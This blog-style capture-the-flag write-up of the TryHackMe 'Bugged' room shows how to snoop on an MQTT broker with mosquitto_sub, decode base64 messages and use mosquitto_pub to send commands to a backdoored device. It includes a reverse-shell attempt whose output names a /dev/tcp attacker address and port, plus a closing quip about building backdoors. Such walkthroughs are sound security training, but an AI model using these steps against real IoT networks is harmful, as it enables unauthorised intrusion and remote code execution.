Hey ! A new room was released on TryHackMe.com : Bugged. The description talks about weird traffic on a network and home appliances. We’re going to try to complete this room by finding the flag hidden somewhere.
As usual, we start with an nmap scan searching for open ports and services :
Here, we find a single service running on port 1883 : mosquitto. This software is an MQTT message broker. The MQTT Protocol is usually used by connected objects that do not often need to send and receive data. In this protocol, there are two different entity types.
- Clients : they are the devices on the network which need to communicate between each others. For example, a smart thermometer in a room, or an oven that you can remotely turn on and off. Client do not directly exchange messages between them.
- Brokers : they are devices on the network that centralizes these communications. When a device has a message to send, it send it to a broker. The broker then sends it to the required clients.
To filter messages, they all have a topic. Usually, these topics are strings separated by forward slashes. For example, the garage temperature sensor could send messages with the topic home/garage/temperature. When a client wants to receive certain messages, it has to subscribe to topics with the broker. When the broker receives messages with the right topic, it will forward them to all subscribed devices. Here is a drawing explaining that :
Now that we have a basic understanding of what is happening on the network, we can try to find a way to see what is transiting on this network. To do that, we will use the mosquitto_sub package, which can be installed using :
apt install mosquitto mosquitto-clientsNow, we can contact the broker and subscribe to every topic, to see what the clients are sending on the network, -t indicating the topic we want to subscribe to. In this case, we are using the multi-level wildcard to subscribe to everything, so that we can monitor the network traffic.
mosquitto_sub -h $BROKER_IP -t "#" -vThis is what we get :
Now, we can see a bunch of IoT devices sending message about their status and measurements, but one of the device looks a bit weird : yR3gPp0r8Y/AGlaMxmHJe/qV66JF5qmH/config, and it seems to send base64 encoded JSON. Let’s try to decode it :
Interesting, it looks like this unknown device can be interacted with, and we know to what topic it is subscribed. Let’s now try to send it a command to see how it responds :
mosquitto_pub -h $BROKER_IP -t XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub -m '{"HELP"}'And we see a response :
And, when we decode it :
Hmm, it looks like this device is a backdoor into the network, and we now know what kind of messages it expects. We can now try to play more with it. Using the ID we got from the first message, we can send this command :
{"id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d", "cmd": "HELP"}And, we get a more complete answer :
Which, once decoded, gives us :
When we run the SYS command, we learn that the system is running a generic 64-bit Linux distribution. We can now run shell commands on the system, if we try to run a simple bash reverse shell :
{"id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d", "cmd": "CMD", "arg": "$REVERSE_SHELL_COMMAND"}This is what we get in return :
{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","response":"/bin/sh: 1: cannot create /dev/tcp/10.11.10.96/4242: Directory nonexistent\n"}It also looks like netcat is not present on the system. Maybe we are trying to go too fast here, if we simply run ls, this is the answer we get :
{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","response":"flag.txt\n"}It was there all along, now, we can cat it and we got our flag !
Yay ! We got our flag, and this room is now complete ! I hope you learned a thing or two about MQTT and IoT security, maybe a new idea to create a backdoor if you ever need to. It also personally reminded me that sometimes the simplest things should be tried first. See you next time !
Leave a Reply